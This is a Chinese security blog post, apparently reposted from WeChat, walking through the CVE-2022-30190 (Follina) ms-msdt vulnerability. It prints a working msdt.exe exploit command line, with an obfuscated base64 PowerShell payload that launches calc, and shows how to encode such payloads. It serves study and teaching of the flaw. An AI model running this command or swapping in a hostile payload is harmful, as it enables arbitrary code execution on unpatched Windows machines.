CVE-2022-30190漏洞的学习二

admin 2025年1月13日19:28:29评论3 views字数 1004阅读3分20秒阅读模式

    看看我遇到了谁,大名鼎鼎的“海阳顶端”,而且是头条上推送的,真是三生有幸!

    大神也在看这个漏洞,并对里面的内容进行了一些别具风格的讲解,浅显易懂,推荐给大家。

一、ms协议

在py代码中有段代码:

代码:msdt.exe /id PCWDiagnostic /skip force /param "IT_RebrowseForFile=? IT_LaunchMethod=ContextMenu IT_BrowseForFile=$(Invoke-Expression($(Invoke-Expression('[System.Text.Encoding]'+[char]58+[char]58+'Unicode.GetString([System.Convert]'+[char]58+[char]58+'FromBase64String('+[char]34+'YwBhAGwAYwA='+[char]34+'))'))))i/../../../../../../../../../../../../../../Windows/System32/mpsigstub.exe"

放在命令行下运行,执行效果如下图:

CVE-2022-30190漏洞的学习二

ms系列是office注册的协议,可以在【设置-应用-默认应用-按协议指定默认应用】中找到相对应的伪协议和所启动的应用。

CVE-2022-30190漏洞的学习二

ms-msdt协议没在这里找到,可以从注册表中找到。command"%SystemRoot%system32msdt.exe" %1

CVE-2022-30190漏洞的学习二

CVE-2022-30190漏洞的学习二

msdt.exe 是微软支持诊断工具。

二、一段代码的解码

有这么段代码:'FromBase64String('+[char]34+'YwBhAGwAYwA='+[char]34+',里面的YwBhAGwAYwA=用工具转换下:

CVE-2022-30190漏洞的学习二

YwBhAGwAYwA=是calc的base64编码。

在这里,大神给出了另两种转换方法,

1、kali下:

$ echo -n 'calc' | iconv -f UTF8 -t UTF16LE | base64

YwBhAGwAYwA

CVE-2022-30190漏洞的学习二

2、powershell下:

[System.Convert]::ToBase64String([System.Text.Encoding]::Unicode.GetBytes('calc'))

CVE-2022-30190漏洞的学习二

通篇下来,难度不大,但胜在清奇,小巧而精致,学习了!

原文始发于微信公众号(MicroPest):CVE-2022-30190漏洞的学习二

免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉。
  • 左青龙
  • 微信扫一扫
  • weinxin
  • 右白虎
  • 微信扫一扫
  • weinxin
admin
  • 本文由 发表于 2025年1月13日19:28:29
  • 转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出):
                   CVE-2022-30190漏洞的学习二https://cn-sec.com/archives/1096037.html
                  免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉.

发表评论

匿名网友 填写信息